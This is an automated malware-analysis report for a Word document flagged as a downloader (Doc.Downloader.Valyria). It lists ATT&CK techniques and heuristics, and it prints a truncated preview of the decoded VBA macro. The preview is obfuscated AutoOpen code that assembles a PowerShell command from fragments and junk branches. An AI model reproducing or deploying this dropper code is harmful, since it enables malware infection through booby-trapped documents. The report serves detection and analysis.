MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes Shell() and CreateObject() calls, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6704836-0' further supports its role as a downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.Valyria-6704836-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60677 bytes |
SHA-256: 434be1ef9d3e9d48483bd84ca3a902b0f12dc1a1ab35e36ccccf793cd746ed6d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
e_kuixtvhu = NaN
If 8629 >= 4178 Then
ieubdbdau = "$poglouhaouyi='a08 + 11';$"
End If
ymksie = NaN
Select Case 62 * 92
Case 5704
ipxiqk = "odyblodpvayioohstaoou='y Byp';"
yead5 = NaN
ieubdbdau = ieubdbdau + ipxiqk
Case ypfmguena76
qsmxwiy = NaN
End Select
ystux = NaN
Select Case "plngvx_gdsy"
Case "plngvx_gdsy"
bmcljhkfu_ybk = "$wiaatvofxaacbo_ea='{ "
keoekcoi = NaN
ieubdbdau = u_mntwhri + ieubdbdau + bmcljhkfu_ybk
End Select
aqaiymsz = NaN
If 66 - 64 = 2 Then
wicfdpu_j7 = "$u_';$m"
ieubdbdau = yloy + ieubdbdau + wicfdpu_j7 + msafzxub
End If
ljihzy = NaN
If 3526 < 1990 Then
Dim ldfiioqe8
ldfiioqe8 = NaN
kjfonwnfqyzf = NaN
ifmhkxqc = NaN
v_appioi = NaN
Else
ofn_ougxa = Environ("SystemRoot")
End If
srmujouxd = NaN
Select Case 72 * 46
Case 3312
uiyiy = ieubdbdau + ejurafkp
Dim irhnxzqhd_otb As String
irhnxzqhd_otb = NaN
eipnu = "rovtemqiebbsr"
kkeibld = NaN
uiyiy = uiyiy + eipnu
Case erudievg_o
iiugdkpd = NaN
End Select
yumy_o_yni = NaN
Select Case "ywzmxuboizq"
Case unhkntzpipo
inmyzrexg = NaN
Case "ywzmxuboizq"
fuayuakgo = qaa_nomyz + uiyiy + uigctkyvz
kkdvii = NaN
fuayuakgo = fuayuakgo + "ommygi_rofj='tion';$"
End Select
iqiec48 = NaN
If 1244 >= 1442 Then
cqtal = NaN
rkmqulm = NaN
ElseIf 3799 > 3177 Then
upvqbeee = "okpmlqslexjoidfhqn_y='$pat';$yhdirprdgnaiomk"
fuayuakgo = fuayuakgo + upvqbeee
Else
iebgr = NaN
Dim urdol As String
urdol = NaN
amjhbtdfydy = NaN
du_ejbwjd = NaN
End If
wsuaji = NaN
Select Case 20 - 96
Case 8777
yyayj = NaN
Case uoeiqeyu
aiuy3 = NaN
Case -76
yoyiiofe = uydnhwejnz + fuayuakgo + gmjvia
uozufftcz = NaN
yoyiiofe = iu_fewi + yoyiiofe + "af"
End Select
lz_afboi_qjy = NaN
If 4360 >= 8316 Then
ElseIf 93 * 91 = 4396 Then
Dim y_zdsuq
y_zdsuq = NaN
eioev = NaN
Else
aogea = e_oedacg_dze1 + yoyiiofe
eoyjnmuu = NaN
aogea = aogea + "nh='x.inf';$u_vdeauykabiyy0"
End If
tpcpaifj = NaN
Select Case 53 + 85
Case 138
o_uev = "7='yunr97"
hzdulbtdewq = NaN
aogea = aogea + o_uev
End Select
tlogwb = NaN
Select Case 70 + 46
Case afii
xhsqpuyajf = NaN
Case 116
iuocaemw = ooerwk + aogea + yifhgmtvq
qpaxas60 = NaN
iuocaemw = iuocaemw + "'')';$sjtmhccih_zo_sveofzomibxhrbeknjei"
End Select
yxtbp = NaN
Select Case "yzfstaytxy7"
Case "yzfstaytxy7"
rljpaeu_i_oa = "vu_oo='i"
meeyaxky = NaN
fjvaifni = NaN
uhqb_t = NaN
iuocaemw = iuocaemw + rljpaeu_i_oa
Case e_oftff_oee6
yczv_qjoye = NaN
Case 19733
yoiur = NaN
End Select
exbvui90 = NaN
Select Case 54 - 51
Case 3
aefpzojo = "le(1)';$oepyvti_gyuxipwoai"
qvou_mbe_n = NaN
iuocaemw = iuocaemw + aefpzojo
End Select
Dim qqofvifqi As String
qqofvifqi = NaN
If 8316 >= 3617 Then
ekwqb = "\syste"
ofn_ougxa = ofn_ougxa + ekwqb
Else
wewgxj = NaN
btttoixqtn = NaN
End If
yahqgd66 = NaN
If 44 + 19 = 25 Then
Dim aoolwiw As String
aoolwiw = NaN
ysdml_i = NaN
ElseIf 2 * 29 = 544 Then
sshoj = NaN
ufbeuq = NaN
Else
yixwl_oi = "='bcli';$qtik"
iuocaemw = iuocaemw + yixwl_oi + pduayjpo
End If
hsybdoi = NaN
Select Case 65 + 51
Case 116
jnsdh_la = iuocaemw
yozydfzo = NaN
jnsdh_la = jnsdh_la + "wja_eioiaer"
Case 24826
uigpwxae35 = NaN
Case 23636
Dim sbao_ey
sbao_ey = NaN
End Select
sczgzy = NaN
Select Case "aobhiht"
Case 18926
vteuicx = NaN
Case "aobhiht"
tlsquzn_wlle = jnsdh_la + oohcdyawta
bbokxaiu_o = NaN
tlsquzn_wlle = tlsquzn_wlle + "davqghiyamgyegnmvdyaut='uble]$"
Case 8928
hga_ebe = NaN
End Select
pvqsabk = NaN
Select Case "ou_yaxau77"
Case iksjrxeofy
dzzpitqh = NaN
Case yjnoeg
hqwae = NaN
Case "ou_yaxau77"
yketpsto = "a';$leiqdaikaupphgaoixrwlt"
ecrfqtqwi = NaN
tlsquzn_wlle = tlsquzn_wlle + yketpsto
End Select
hyey_qpi = NaN
pkeaov = NaN
io_iyu_bti = NaN
Select Case "excwtoq"
Case "e
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.